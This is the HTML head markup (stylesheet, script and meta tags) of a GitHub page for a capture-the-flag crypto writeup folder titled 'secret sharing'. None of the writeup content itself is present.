integrity="sha512-IpkvxndMpMcO4paMJl83lYTcy18jv2jqG7mHZnTfr9HRV09iMhuQ/HrE+4mQO2nshL7ZLejO1OiVNDQkyVFOCA==" rel="stylesheet" data-href="https://github.githubassets.com/assets/light_colorblind-22992fc6774ca4c70ee2968c265f3795.css" /> <link crossorigin="anonymous" media="all" integrity="sha512-4hzfg/znP4UxIOUt/r3SNYEZ6jBPJIS6PH4VC26tE0Nd4xAymMC3KXDaC9YITfG4fhyfxuB1YnDHo1H2iUwsfg==" rel="stylesheet" href="https://github.githubassets.com/assets/frameworks-e21cdf83fce73f853120e52dfebdd235.css" /> <link crossorigin="anonymous" media="all" integrity="sha512-sT0AyFLl78shyaRWRXOw8uwRSnR+7tURIXoJwVYadATkrqeWfze5y/tOu8MS1mbzUKl6pgLjfEdT+U8bwBJHfQ==" rel="stylesheet" href="https://github.githubassets.com/assets/behaviors-b13d00c852e5efcb21c9a4564573b0f2.css" /> <link crossorigin="anonymous" media="all" integrity="sha512-jdtbQr5ZSKZqID/c80i87Ml+YyEhYVd5sF9szeR+Xuvbfhi4yLJbEsSllzk0XRzcbWqD4tDtshhRo5IuJx4Mzw==" rel="stylesheet" href="https://github.githubassets.com/assets/github-8ddb5b42be5948a66a203fdcf348bcec.css" />
<script crossorigin="anonymous" defer="defer" integrity="sha512-/0zs/So9AxtDONKx324yW8s62PoPMx4Epxmk1aJmMgIYIKUkQg4YqlZQ06B4j0tSXQcUB8/zWiIkhLtVEozU/w==" type="application/javascript" src="https://github.githubassets.com/assets/environment-ff4cecfd.js"></script> <script crossorigin="anonymous" defer="defer" integrity="sha512-8p4kkx6e3xBq1g3NP0O3/AW/aiTQ+VRxYencIeMD8crx7AEwrOTV+XOL/UE8cw4vEvkoU/zzLEZ9cud0jFfI4w==" type="application/javascript" src="https://github.githubassets.com/assets/chunk-frameworks-f29e2493.js"></script> <script crossorigin="anonymous" defer="defer" integrity="sha512-slE3Aa2Duzwgju0UbTfes+w5slmaEOhXwom+Ev+pPsxxOpeh2CGZqfriJGr6pkhTZX+ffOTTYl3GnSLtp7AkJw==" type="application/javascript" src="https://github.githubassets.com/assets/chunk-vendor-b2513701.js"></script> <script crossorigin="anonymous" defer="defer" integrity="sha512-ZDU7IsI6lFo4eeBuqkrh/Htsa12ZYOi44uBhKqG0LyV6XHM502iJjjsIVnmtmNXrrC9oGMf2O5i57Bx4lwGsXw==" type="application/javascript" src="https://github.githubassets.com/assets/behaviors-64353b22.js"></script> <script crossorigin="anonymous" defer="defer" integrity="sha512-ODZJzCJpaOfusrIka5QVZQcPiO9LBGyrrMYjhhJWSLuCN5WbZ5xiEiiOPOKVu71dqygyRdB2TY7AKPA1J5hqdg==" type="application/javascript" data-module-id="./chunk-unveil.js" data-src="https://github.githubassets.com/assets/chunk-unveil-383649cc.js"></script> <script crossorigin="anonymous" defer="defer" integrity="sha512-emPgUbSwW9ezLCgRnTE7n4fbbfc/MqEEDHmnkmG61dTyjWKHTYKN4wN3OPS7SY0fwmSJ8mB5+gng2nZw4/HsUg==" type="application/javascript" data-module-id="./chunk-animate-on-scroll.js" data-src="https://github.githubassets.com/assets/chunk-animate-on-scroll-7a63e051.js"></script> <script crossorigin="anonymous" defer="defer" integrity="sha512-pWX6rMbTl/ERAhhtbAyXiJzoXFr91jp/mRy2Xk4OpAId3aVFI2X+yI8X3mhbf985F5BRHamuRx20kG62nRtSLQ==" type="application/javascript" data-module-id="./chunk-ref-selector.js" data-src="https://github.githubassets.com/assets/chunk-ref-selector-a565faac.js"></script> <script crossorigin="anonymous" defer="defer" integrity="sha512-GKiNgfnSOtC7SUFIvLZMYoteE7iKDONxzaeovKiziJczuW1P4KMU1KhXeoTv4WEN0ufeXC9ejA8HvgYa+xPAAQ==" type="application/javascript" data-module-id="./chunk-filter-input.js" data-src="https://github.githubassets.com/assets/chunk-filter-input-18a88d81.js"></script> <script crossorigin="anonymous" defer="defer" integrity="sha512-HRWFwpj3BLrXflQCvPbnuXPFjpnti5TtcqJqUx/b6klMyuskNlUBIo+1UT0KVHFdEW/Y9QKjmXlZxhP6z1j5pg==" type="application/javascript" data-module-id="./chunk-edit.js" data-src="https://github.githubassets.com/assets/chunk-edit-1d1585c2.js"></script> <script crossorigin="anonymous" defer="defer" integrity="sha512-GhqHDMwaAgqUsjVyltYVhaaLYy2G887rPRXXNbsdaI+Xm3dh0fbaHLhZns70EjFAEpXBgCAYFYdnlG1IQFmz1A==" type="application/javascript" data-module-id="./chunk-responsive-underlinenav.js" data-src="https://github.githubassets.com/assets/chunk-responsive-underlinenav-1a1a870c.js"></script> <script crossorigin="anonymous" defer="defer" integrity="sha512-gmw7obKL/JEHWPp6zWFh+ynbXUFOidj1DN2aPiTDwP8Gair0moVuDmA340LD84A29I3ZPak19CEiumG+oIiseg==" type="application/javascript" data-module-id="./chunk-tag-input.js" data-src="https://github.githubassets.com/assets/chunk-tag-input-826c3ba1.js"></script> <script crossorigin="anonymous" defer="defer" integrity="sha512-Ao9llFIlj54ApuKf2QLboXukbu2h7MHfMmtYHrrsVe1lprKNLiA0usVcRpvruKhfT5STDuWm/GGmyx8ox27hWQ==" type="application/javascript" data-module-id="./chunk-notification-list-focus.js" data-src="https://github.githubassets.com/assets/chunk-notification-list-focus-028f6594.js"></script> <script crossorigin="anonymous" defer="defer" integrity="sha512-SPWd3rzrxmU6xW6vy1JPWCd+3uWFWmnd0MVGpmw/TpHWUAdLWDqL8kWyC/sBIZJmda4mTtUO1DHJQzAXRSrC+g==" type="application/javascript" data-module-id="./chunk-cookies.js" data-src="https://github.githubassets.com/assets/chunk-cookies-48f59dde.js"></script> <script crossorigin="anonymous" defer="defer" integrity="sha512-MK53GXbb2BPV+ADlEbJbkrvg34WPcAd5RC2nBJhUH1tR/Mjr9xrsf56ptBajfWcIWKRKbqqRtLktgr0wAbB3zw==" type="application/javascript" data-module-id="./chunk-async-export.js" data-src="https://github.githubassets.com/assets/chunk-async-export-30ae7719.js"></script> <script crossorigin="anonymous" defer="defer" integrity="sha512-tw9SApiMkftVBYeb6/VGhEwGNw8tlyBhXc9RVXH4UbCD6u+48uuCMvXf3bxvBdOld0OoYg83SnD2mgJWhdaTiQ==" type="application/javascript" data-module-id="./chunk-premium-runners.js" data-src="https://github.githubassets.com/assets/chunk-premium-runners-b70f5202.js"></script> <script crossorigin="anonymous" defer="defer" integrity="sha512-D576CjzS9sbDqFBJdq0Y6+KVMHXkO6mLFO/GRL1NtoE8jgXjAvmdjoZ4nNMWyDwqbtBHspvupORzE9L+YoBLYQ==" type="application/javascript" data-module-id="./chunk-get-repo-element.js" data-src="https://github.githubassets.com/assets/chunk-get-repo-element-0f9efa0a.js"></script> <script crossorigin="anonymous" defer="defer" integrity="sha512-xhSAO0KtnFAlRqAK+mg8BPj/J334ccvnCmmjmBQBCgZcsoO9teHJSS6oAn3XOWYFsWPU2JehwG7S3OVEbLwdUg==" type="application/javascript" data-module-id="./chunk-color-modes.js" data-src="https://github.githubassets.com/assets/chunk-color-modes-c614803b.js"></script> <script crossorigin="anonymous" defer="defer" integrity="sha512-jitxouuFY6SUcDZV5W3jhadVEIfFBfCQZxfPV3kxNnsWEBzbxMJFp0ccLb7+OlBjSs1zU/MNtuOV6T9Ay7lx4w==" type="application/javascript" data-module-id="./chunk-copy.js" data-src="https://github.githubassets.com/assets/chunk-copy-8e2b71a2.js"></script> <script crossorigin="anonymous" defer="defer" integrity="sha512-Auj2atZZccqguPinFmOL2k1TCzZs/yfMMFF5aMYMB/5miqEN7v4oAFG0o3Np24NOTkJ9o/txZCeuT6NGHgGoUA==" type="application/javascript" data-module-id="./chunk-voting.js" data-src="https://github.githubassets.com/assets/chunk-voting-02e8f66a.js"></script> <script crossorigin="anonymous" defer="defer" integrity="sha512-HDsLJf6gAN+WDFaJneJwmIY82XkZKWqeX7tStBLRh1XM53K8vMV6JZvjq/UQXszaNVWxWcuYtgYTG6ZWo8+QSw==" type="application/javascript" data-module-id="./chunk-confetti.js" data-src="https://github.githubassets.com/assets/chunk-confetti-1c3b0b25.js"></script> <script crossorigin="anonymous" defer="defer" integrity="sha512-zEirtMGIgj3NVAnB8kWhDykK5NLa7q4ugkIxB7EftbovRjhU3X5I/20Rploa4KGPwAR27e36rAljHIsDKbTm/Q==" type="application/javascript" data-module-id="./chunk-codemirror.js" data-src="https://github.githubassets.com/assets/chunk-codemirror-cc48abb4.js"></script> <script crossorigin="anonymous" defer="defer" integrity="sha512-Gr3ZcJt5t73JeBM3NwOEziKyDZ3HpHwzqZL/c1pgTUfo+6QC5f88XXRw/RT6X2diwqvaa3OVFh0oWsZ9ZxhtdQ==" type="application/javascript" data-module-id="./chunk-tip.js" data-src="https://github.githubassets.com/assets/chunk-tip-1abdd970.js"></script> <script crossorigin="anonymous" defer="defer" integrity="sha512-EdQvlnI4Pu5Q6K0HCvp+mi0Vw9ZuwaEuhbnCbmFKX+c0xwiUWY0L3n9P0F6doLhaHhfpvW3718+miL11WG4BeA==" type="application/javascript" data-module-id="./chunk-line.js" data-src="https://github.githubassets.com/assets/chunk-line-11d42f96.js"></script> <script crossorigin="anonymous" defer="defer" integrity="sha512-4zSHP2sQXPKoN9jFy8q2ThHsQNej8s4qhubSR4g0/2dTexAEnoTG+RbaffdIhmjfghGjpS/DlE0cdSTFEOcipQ==" type="application/javascript" data-module-id="./chunk-array.js" data-src="https://github.githubassets.com/assets/chunk-array-e334873f.js"></script> <script crossorigin="anonymous" defer="defer" integrity="sha512-g8fb6U7h9SkWgiK69nfNMn4aN5D2YBYPZUbCIuLpemWoOw8NOaZY8Z0hPq4RUVs4+bYdCFR6K719k8lwFeUijg==" type="application/javascript" data-module-id="./chunk-band.js" data-src="https://github.githubassets.com/assets/chunk-band-83c7dbe9.js"></script> <script crossorigin="anonymous" defer="defer" integrity="sha512-6oWCu7ltWLHlroIRg8mR6RloC1wqKS9aK9e5THWgzaE2GNPAdoC+MLZEYD/TdIiZxsQRev0RInyonsXGBK0aMw==" type="application/javascript" data-module-id="./chunk-toast.js" data-src="https://github.githubassets.com/assets/chunk-toast-ea8582bb.js"></script> <script crossorigin="anonymous" defer="defer" integrity="sha512-miaiZ1xkDsWBUsURHOmeYtbgVKQGnm1octCo/lDXUmPzDyjtubnHULRVw1AK+sttwdwyB0+LOyhIVAWCNSGx+A==" type="application/javascript" data-module-id="./chunk-delayed-loading-element.js" data-src="https://github.githubassets.com/assets/chunk-delayed-loading-element-9a26a267.js"></script> <script crossorigin="anonymous" defer="defer" integrity="sha512-GD25CNhMGDMzEmeFhUT0FILBupAkx5/CHohnYXOP1togy40O0iu/lASaSp3gV8ue0nwscalJVQqR5gKDRHHDVg==" type="application/javascript" data-module-id="./chunk-three.module.js" data-src="https://github.githubassets.com/assets/chunk-three.module-183db908.js"></script> <script crossorigin="anonymous" defer="defer" integrity="sha512-4vVRplWFI7P4m3RHQ0QAhkq6eZUdtIE8PBhsKYJRwDkhQw9iK/U1st1/fM1tQZFuBFwGMyqaZblbWtQ+2ejcqQ==" type="application/javascript" data-module-id="./chunk-slug.js" data-src="https://github.githubassets.com/assets/chunk-slug-e2f551a6.js"></script> <script crossorigin="anonymous" defer="defer" integrity="sha512-Ofk7ddnMsJ6F9d2vCuPQav+FG9Rg8i6WRG2KmbzwT01S9H4y58Fl42zYxDh/lJjOWeSyOB9KJyfIkdpCCTYG9A==" type="application/javascript" data-module-id="./chunk-invitations.js" data-src="https://github.githubassets.com/assets/chunk-invitations-39f93b75.js"></script> <script crossorigin="anonymous" defer="defer" integrity="sha512-vFR+IqThljOLrAWmjhOL/kiQrjgZZg95uPovX0J7kRH5p7Y049LDRZaXLMDijfeqqk71d3MMn9XP5bUcH+lB9w==" type="application/javascript" data-module-id="./chunk-profile.js" data-src="https://github.githubassets.com/assets/chunk-profile-bc547e22.js"></script> <script crossorigin="anonymous" defer="defer" integrity="sha512-FeRujRzXPfs03roBR3mnHvWukfFpu27XbyZPQri9jcCY0AdUWSM5R4drHTJUDQ62Pz/aX0rSS5xORvTu7NsjlQ==" type="application/javascript" data-module-id="./chunk-overview.js" data-src="https://github.githubassets.com/assets/chunk-overview-15e46e8d.js"></script> <script crossorigin="anonymous" defer="defer" integrity="sha512-xqw233932eUGcGURAPuwUWZpC5Km/9Btq7/2Jnkt1rSWnPSVfMl+JKpr9eLtCoQmrpgP8vaghEuX8bWAS8fzTg==" type="application/javascript" data-module-id="./chunk-advanced.js" data-src="https://github.githubassets.com/assets/chunk-advanced-c6ac36df.js"></script> <script crossorigin="anonymous" defer="defer" integrity="sha512-6Rmd0BBAsJ9ouvb/pgrkToMPs5ogcqi8rcQ7R3GDPPHIjlu0NZ0Bx6HUn/aOruMCECETHm4Exfs5gjYdHs66RQ==" type="application/javascript" data-module-id="./chunk-runner-groups.js" data-src="https://github.githubassets.com/assets/chunk-runner-groups-e9199dd0.js"></script> <script crossorigin="anonymous" defer="defer" integrity="sha512-xdGx4qSd2qa0c/AVc4wDqpBhFHasDjOZ5y+MbwuIRA+ar7YxAFhZ2pGFs/+W5hVjSv+BMfKrcWpgLwR3xPIWHA==" type="application/javascript" data-module-id="./chunk-profile-pins-element.js" data-src="https://github.githubassets.com/assets/chunk-profile-pins-element-c5d1b1e2.js"></script> <script crossorigin="anonymous" defer="defer" integrity="sha512-LrD2kFGlUY4JxKVeN3dgYfuhfq0akTPGHtqW0gxkM2sDqVY6pauK2k57tmMHw4TQdcUrs+RQnBc1HPD+ou+ZfQ==" type="application/javascript" data-module-id="./chunk-emoji-picker-element.js" data-src="https://github.githubassets.com/assets/chunk-emoji-picker-element-2eb0f690.js"></script> <script crossorigin="anonymous" defer="defer" integrity="sha512-EvJ2Fip59DXgARNuwTWgjdVqoCjhXQL73SP9yexijlWStKq92sfbKeGK5R4wIP0QOr39WsnW/Kaw3Wpl1QPfog==" type="application/javascript" data-module-id="./chunk-edit-hook-secret-element.js" data-src="https://github.githubassets.com/assets/chunk-edit-hook-secret-element-12f27616.js"></script> <script crossorigin="anonymous" defer="defer" integrity="sha512-W0EihGBOA1mE3orR7s2squ9xVaLXrwd2bOYY9SSslfZHrovrS6KenJU+XXn+CaykddON6/aFEd/FbuQ/FltI9Q==" type="application/javascript" data-module-id="./chunk-insights-query.js" data-src="https://github.githubassets.com/assets/chunk-insights-query-5b412284.js"></script> <script crossorigin="anonymous" defer="defer" integrity="sha512-D/5Ad6jlKQNRPSHbVN5ShlFXOTyRsKbT7O0cWbVHwtOZ/UrwOC5bHKaQFHTq46qeMBbFKyDG+oIdtm5G8NifDA==" type="application/javascript" data-module-id="./chunk-remote-clipboard-copy.js" data-src="https://github.githubassets.com/assets/chunk-remote-clipboard-copy-0ffe4077.js"></script> <script crossorigin="anonymous" defer="defer" integrity="sha512-SUjF5sI77QngAIQUwKJRgZuIM4qggFBMtOZJ3EFS7ecv4uq4BQQJivDVxNBG9api9/rWrpw0d6RzvTCz2GrbdA==" type="application/javascript" data-module-id="./chunk-series-table.js" data-src="https://github.githubassets.com/assets/chunk-series-table-4948c5e6.js"></script> <script crossorigin="anonymous" defer="defer" integrity="sha512-nrfktuuo7BZhPpJxM4fVi62vPbZu6VJZ7ykfarxBExTTDnchXEalCJOq2O3GrVdfWu9cdn9kR/J8+oeTAjdHlA==" type="application/javascript" data-module-id="./chunk-line-chart.js" data-src="https://github.githubassets.com/assets/chunk-line-chart-9eb7e4b6.js"></script> <script crossorigin="anonymous" defer="defer" integrity="sha512-IOMGagwchKC7UeWHK/bV/rO1F1/RZAH0fNNouWV2boLOtE1a9LUbesoRsYK7sz6aFXslPC8fLfow+yWpT1eZzQ==" type="application/javascript" data-module-id="./chunk-stacked-area-chart.js" data-src="https://github.githubassets.com/assets/chunk-stacked-area-chart-20e3066a.js"></script> <script crossorigin="anonymous" defer="defer" integrity="sha512-GohDpVrxfHqlavb8Zabvj+y/s6CHegYwyGpQxKtzR2MkQsynBC98LdLongRFMHI+TKAECLavp200Lsy9JbV5TQ==" type="application/javascript" data-module-id="./chunk-presence-avatars.js" data-src="https://github.githubassets.com/assets/chunk-presence-avatars-1a8843a5.js"></script> <script crossorigin="anonymous" defer="defer" integrity="sha512-TpHTIXhA/2bI21CVmFL1oS3dv+8zveJVZLOVVAZwXNAAI94Hy70L9vT3Q1Vvkyu4Z2gi2iFdy1a53pfYlEDgnQ==" type="application/javascript" data-module-id="./chunk-pulse-authors-graph-element.js" data-src="https://github.githubassets.com/assets/chunk-pulse-authors-graph-element-4e91d321.js"></script> <script crossorigin="anonymous" defer="defer" integrity="sha512-aNAcFMlIdG1ocY5LnZylnN/6KXiJxyPvKg7y1Jnai732wdnrjXazcvNiQkRnj5FY8WP6JRa3K4doCReA4nhj7w==" type="application/javascript" data-module-id="./chunk-stacks-input-config-view.js" data-src="https://github.githubassets.com/assets/chunk-stacks-input-config-view-68d01c14.js"></script> <script crossorigin="anonymous" defer="defer" integrity="sha512-MXXdKvrDUhz9jfXB1/McrPebK8VbV5haYcxcNt5WXgbUym55dZattmCIAK2pJFAD2h4aBUFHo7CzpjmDYf7EkQ==" type="application/javascript" data-module-id="./chunk-community-contributions.js" data-src="https://github.githubassets.com/assets/chunk-community-contributions-3175dd2a.js"></script> <script crossorigin="anonymous" defer="defer" integrity="sha512-eWDdPSTt/NMNFFSNdUSOf36O6AJJepQdiKFtVzHjM5WYpUTAg21zPoyeA4DqfPNL5RggK/+RjWQZzypmNBAH4w==" type="application/javascript" data-module-id="./chunk-discussion-page-views.js" data-src="https://github.githubassets.com/assets/chunk-discussion-page-views-7960dd3d.js"></script> <script crossorigin="anonymous" defer="defer" integrity="sha512-5+v3VN/rhJv/1iAOVphuCGs1FM9eUlSB43CJLw1txGMLvuPNNz/xHQbzTOIW+t2NKFpTnptRvKbuicQ3Jp28UQ==" type="application/javascript" data-module-id="./chunk-discussions-daily-contributors.js" data-src="https://github.githubassets.com/assets/chunk-discussions-daily-contributors-e7ebf754.js"></script> <script crossorigin="anonymous" defer="defer" integrity="sha512-/PSS3erY5t+SZL9B5T6Edgzy2pLD3jx7G/ZqQE+UCPhaaMEEc8Qrhv5XTREOOX0e3DquvxVDDM/KVa6SK/BPcA==" type="application/javascript" data-module-id="./chunk-discussions-new-contributors.js" data-src="https://github.githubassets.com/assets/chunk-discussions-new-contributors-fcf492dd.js"></script> <script crossorigin="anonymous" defer="defer" integrity="sha512-7vazCSTbHAmhDkKepqPuoJu5ZlBV51uKBKdUTiKd5UylsfULxuXr6XtFSZ16eU4TzdMAifa2hR4riO/QRi/9gw==" type="application/javascript" data-module-id="./chunk-tweetsodium.js" data-src="https://github.githubassets.com/assets/chunk-tweetsodium-eef6b309.js"></script> <script crossorigin="anonymous" defer="defer" integrity="sha512-AVKfqEKBF/JCvS2PoakItu304k6gGt9oSMBW2R/eEfGsGuTmC9QeiQw//IJJKFRQdrzpha/FoC/cws9v6dsujQ==" type="application/javascript" data-module-id="./chunk-jump-to.js" data-src="https://github.githubassets.com/assets/chunk-jump-to-01529fa8.js"></script> <script crossorigin="anonymous" defer="defer" integrity="sha512-mQXS2AvjT52IlcDNeeAaWUnOLa3aaGISiApB7zeboZBSILzsVM1ikEJdM7VIaH+xwYYT/D6lqtIwjO1/KVbK2Q==" type="application/javascript" data-module-id="./chunk-user-status-submit.js" data-src="https://github.githubassets.com/assets/chunk-user-status-submit-9905d2d8.js"></script> <script crossorigin="anonymous" defer="defer" integrity="sha512-4xtjUJAtGhsZOLk+SHoir8MWF0vKHoR4tGlR36xsg1kGrE9ftN4BHe21k2TT5jSkqz5x8z7BfZKj/eUuwcZMEQ==" type="application/javascript" data-module-id="./chunk-launch-code-element.js" data-src="https://github.githubassets.com/assets/chunk-launch-code-element-e31b6350.js"></script> <script crossorigin="anonymous" defer="defer" integrity="sha512-NilVxyBbQNJ61v85EVcC3VjOsz5tz+bOlaR1h1R+jIFXNT8VhoalRgPXREht+R3JIZF5fiqkkHZy3+01pX4ZDg==" type="application/javascript" data-module-id="./chunk-metric-selection-element.js" data-src="https://github.githubassets.com/assets/chunk-metric-selection-element-362955c7.js"></script> <script crossorigin="anonymous" defer="defer" integrity="sha512-VtwQp1HbSSWXOsB5a8wzpRH8Bl7/vD0jgBgXsp2K2CTYkhfq/LAWps52SnVQjcRPoB2svCVaJV20hyFuCbGL3w==" type="application/javascript" data-module-id="./chunk-severity-calculator-element.js" data-src="https://github.githubassets.com/assets/chunk-severity-calculator-element-56dc10a7.js"></script> <script crossorigin="anonymous" defer="defer" integrity="sha512-yXHkwiNZgB6O0iSDKE8jrZzTtTyF8YdFFXHcemhWEPuN3sWs1PQrSwEh0Gw4/B9TIzUfvogbqlJ71yLLuqyM+Q==" type="application/javascript" data-module-id="./chunk-readme-toc-element.js" data-src="https://github.githubassets.com/assets/chunk-readme-toc-element-c971e4c2.js"></script> <script crossorigin="anonymous" defer="defer" integrity="sha512-QMvMhJF7+RJNuy+lp8zP+XbKf08Cc36NVOw6CMk0WRGAO1kmoNhTC+FjHB5EBFx/sDurFeYqerS3NGhusJncMA==" type="application/javascript" data-module-id="./chunk-feature-callout-element.js" data-src="https://github.githubassets.com/assets/chunk-feature-callout-element-40cbcc84.js"></script> <script crossorigin="anonymous" defer="defer" integrity="sha512-SyYXfc8EbLO9BnTas69LeNMF6aXITT41QqsFoIuEHHt/0i9+WQAV7ZFBu944TFS7HHFu9eRgmdq1MU/W12Q8xw==" type="application/javascript" data-module-id="./chunk-sortable-behavior.js" data-src="https://github.githubassets.com/assets/chunk-sortable-behavior-4b26177d.js"></script> <script crossorigin="anonymous" defer="defer" integrity="sha512-6JUQHgkTqBaCCdDugMcO4fQ8YxUHk+m6rwVp2Wxa4FMVz6BbBMPOzGluT4wBq8NTUcFv6DnXSOnt5e85jNgpGg==" type="application/javascript" data-module-id="./chunk-drag-drop.js" data-src="https://github.githubassets.com/assets/chunk-drag-drop-e895101e.js"></script> <script crossorigin="anonymous" defer="defer" integrity="sha512-28pipPJZvizfcYYETJWBBeDHsrDEz7A06d7Y5swgY/OWmsX0ZJW6mkZVFRO7Z/xZh1D1qFbPHGNixfCd1YpBnA==" type="application/javascript" data-module-id="./chunk-contributions-spider-graph.js" data-src="https://github.githubassets.com/assets/chunk-contributions-spider-graph-dbca62a4.js"></script> <script crossorigin="anonymous" defer="defer" integrity="sha512-y0yuiXfWuIeCCcUBT1jacp25vWnFCJWgwLM5G1VM4tmCHdoQbiVjvW/vuSuEXUjtS8WwdioTD5hVv9UULiUlww==" type="application/javascript" data-module-id="./chunk-webgl-warp.js" data-src="https://github.githubassets.com/assets/chunk-webgl-warp-cb4cae89.js"></script> <script crossorigin="anonymous" defer="defer" integrity="sha512-3R5+VhOHwJbG+s7VKlj1HjwVKo/RPldgUh98Yed4XMlk1jH7LP20vRYmLUqnvVaZcgx9x9XdWmQWKaBRQfsVvg==" type="application/javascript" src="https://github.githubassets.com/assets/codespaces-dd1e7e56.js"></script><script crossorigin="anonymous" defer="defer" integrity="sha512-tfzZxJCbul4TLTQmD9EJzuvXoLZGUCnWTiuJCGnXlaABfL2eD0I/J/IL9blT+JbF1dQvKi1g/E7396zAKdrZTA==" type="application/javascript" src="https://github.githubassets.com/assets/repositories-b5fcd9c4.js"></script><script crossorigin="anonymous" defer="defer" integrity="sha512-CfJc9iAnfLJnxnvSY41oW/N+iuVSia2CCj/v47XVliM9ACQPKur94EPHnokX0RG8e+FPMhJ2CGy9FfqLYZi4Dg==" type="application/javascript" src="https://github.githubassets.com/assets/topic-suggestions-09f25cf6.js"></script><script crossorigin="anonymous" defer="defer" integrity="sha512-Y9QCffkHDk3/KAoYUMhKeokbNlXWgpO+53XrccRwhUWzMTxEmhnp1ce7OVWP3vOzhCfWaxxnKWW9eVjjny8nRA==" type="application/javascript" src="https://github.githubassets.com/assets/code-menu-63d4027d.js"></script>
<meta name="viewport" content="width=device-width"> <title>CTF-Writeups/TamilCTF/Crypto/secret sharing at main · 0xM4hm0ud/CTF-Writeups · GitHub</title> <meta name="description" content="This are my personal Writeups for different CTF's. Contribute to 0xM4hm0ud/CTF-Writeups development by creating an account on GitHub."> <link rel="search" type="application/opensearchdescription+xml" href="/opensearch.xml" title="GitHub"> <link rel="fluid-icon" href="https://github.com/fluidicon.png" title="GitHub"> <meta property="fb:app_id" content="1401488693436528"> <meta name="apple-itunes-app" content="app-id=1477376905" /> <meta name="twitter:image:src" content="https://opengraph.githubassets.com/6591a2cd3d0f534713b3c6e35c342770ee7a0ceb8863cdc821fa22209a9fedb5/0xM4hm0ud/CTF-Writeups" /><meta name="twitter:site" content="@github" /><meta name="twitter:card" content="summary_large_image" /><meta name="twitter:title" content="CTF-Writeups/TamilCTF/Crypto/secret sharing at main · 0xM4hm0ud/CTF-Writeups" /><meta name="twitter:description" content="This are my personal Writeups for different CTF's. Contribute to 0xM4hm0ud/CTF-Writeups development by creating an account on GitHub." /> <meta property="og:image" content="https://opengraph.githubassets.com/6591a2cd3d0f534713b3c6e35c342770ee7a0ceb8863cdc821fa22209a9fedb5/0xM4hm0ud/CTF-Writeups" /><meta property="og:image:alt" content="This are my personal Writeups for different CTF's. Contribute to 0xM4hm0ud/CTF-Writeups development by creating an account on GitHub." /><meta property="og:image:width" content="1200" /><meta property="og:image:height" content="600" /><meta property="og:site_name" content="GitHub" /><meta property="og:type" content="object" /><meta property="og:title" content="CTF-Writeups/TamilCTF/Crypto/secret sharing at main · 0xM4hm0ud/CTF-Writeups" /><meta property="og:url" content="https://github.com/0xM4hm0ud/CTF-Writeups" /><meta property="og:description" content="This are my personal Writeups for different CTF's. Contribute to 0xM4hm0ud/CTF-Writeups development by creating an account on GitHub." />
<link rel="assets" href="https://github.githubassets.com/">
<meta name="request-id" content="B2E2:0530:10FF0FA:11BB0A2:61830695" data-pjax-transient="true"/><meta name="html-safe-nonce" content="4201ca38660b38d9ea33dd575c8ffb1fd489245eb4777e74b568467181b4bf4f" data-pjax-transient="true"/><meta name="visitor-payload" content="eyJyZWZlcnJlciI6IiIsInJlcXVlc3RfaWQiOiJCMkUyOjA1MzA6MTBGRjBGQToxMUJCMEEyOjYxODMwNjk1IiwidmlzaXRvcl9pZCI6IjEwOTE3ODUyNzk1OTkyMTYyNzciLCJyZWdpb25fZWRnZSI6ImZyYSIsInJlZ2lvbl9yZW5kZXIiOiJmcmEifQ==" data-pjax-transient="true"/><meta name="visitor-hmac" content="ac3078ece57444698779e8a4c67f8ea4c312607c2c2bab65fb52d8d58f5266aa" data-pjax-transient="true"/>
<meta name="hovercard-subject-tag" content="repository:391709258" data-pjax-transient>
<meta name="github-keyboard-shortcuts" content="repository,source-code" data-pjax-transient="true" />
<meta name="selected-link" value="repo_source" data-pjax-transient>
<meta name="google-site-verification" content="c1kuD-K2HIVF635lypcsWPoD4kilo5-jA_wBFyT4uMY"> <meta name="google-site-verification" content="KT5gs8h0wvaagLKAVWq8bbeNwnZZK1r1XQysX3xurLU"> <meta name="google-site-verification" content="ZzhVyEFwb7w3e0-uOTltm8Jsck2F5StVihD0exw2fsA"> <meta name="google-site-verification" content="GXs5KoUUkNCoaAZn7wPN-t01Pywp9M3sEjnt_3_ZWPc">
<meta name="octolytics-url" content="https://collector.githubapp.com/github/collect" />
<meta name="analytics-location" content="/<user-name>/<repo-name>/files/disambiguate" data-pjax-transient="true" />
<meta name="hostname" content="github.com"> <meta name="user-login" content="">
<meta name="expected-hostname" content="github.com">
<meta name="enabled-features" content="MARKETPLACE_PENDING_INSTALLATIONS,FILE_UPLOAD_CURSOR_POSITION">
<meta http-equiv="x-pjax-version" content="89408a5ac57f5b71ed7ebb466b241a52be13289bf52f5580353d1ab3681a2237"> <meta http-equiv="x-pjax-csp-version" content="9ea82e8060ac9d44365bfa193918b70ed58abd9413362ba412abb161b3a8d1b6"> <meta http-equiv="x-pjax-css-version" content="8c75751aad52ee8322f8435d51506c1b59a636003602b767a0b479bddfe5cb22"> <meta http-equiv="x-pjax-js-version" content="3cad26b543586e12a4ad3073df6bdffcfe52ab9dafecfd0ffc60594d519fb9b5">
<meta name="go-import" content="github.com/0xM4hm0ud/CTF-Writeups git https://github.com/0xM4hm0ud/CTF-Writeups.git">
<meta name="octolytics-dimension-user_id" content="80924519" /><meta name="octolytics-dimension-user_login" content="0xM4hm0ud" /><meta name="octolytics-dimension-repository_id" content="391709258" /><meta name="octolytics-dimension-repository_nwo" content="0xM4hm0ud/CTF-Writeups" /><meta name="octolytics-dimension-repository_public" content="true" /><meta name="octolytics-dimension-repository_is_fork" content="false" /><meta name="octolytics-dimension-repository_network_root_id" content="391709258" /><meta name="octolytics-dimension-repository_network_root_nwo" content="0xM4hm0ud/CTF-Writeups" />
<link rel="canonical" href="https://github.com/0xM4hm0ud/CTF-Writeups/tree/main/TamilCTF/Crypto/secret%20sharing" data-pjax-transient>
<meta name="browser-stats-url" content="https://api.github.com/_private/browser/stats">
<meta name="browser-errors-url" content="https://api.github.com/_private/browser/errors">
<meta name="browser-optimizely-client-errors-url" content="https://api.github.com/_private/browser/optimizely_client/errors">
<link rel="mask-icon" href="https://github.githubassets.com/pinned-octocat.svg" color="#000000"> <link rel="alternate icon" class="js-site-favicon" type="image/png" href="https://github.githubassets.com/favicons/favicon.png"> <link rel="icon" class="js-site-favicon" type="image/svg+xml" href="https://github.githubassets.com/favicons/favicon.svg">
<meta name="theme-color" content="#1e2327"><meta name="color-scheme" content="light dark" />
<link rel="manifest" href="/manifest.json" crossOrigin="use-credentials">
</head>
<body class="logged-out env-production page-responsive" style="word-wrap: break-word;">
<div class="position-relative js-header-wrapper "> Skip to content <span> <span></span></span>
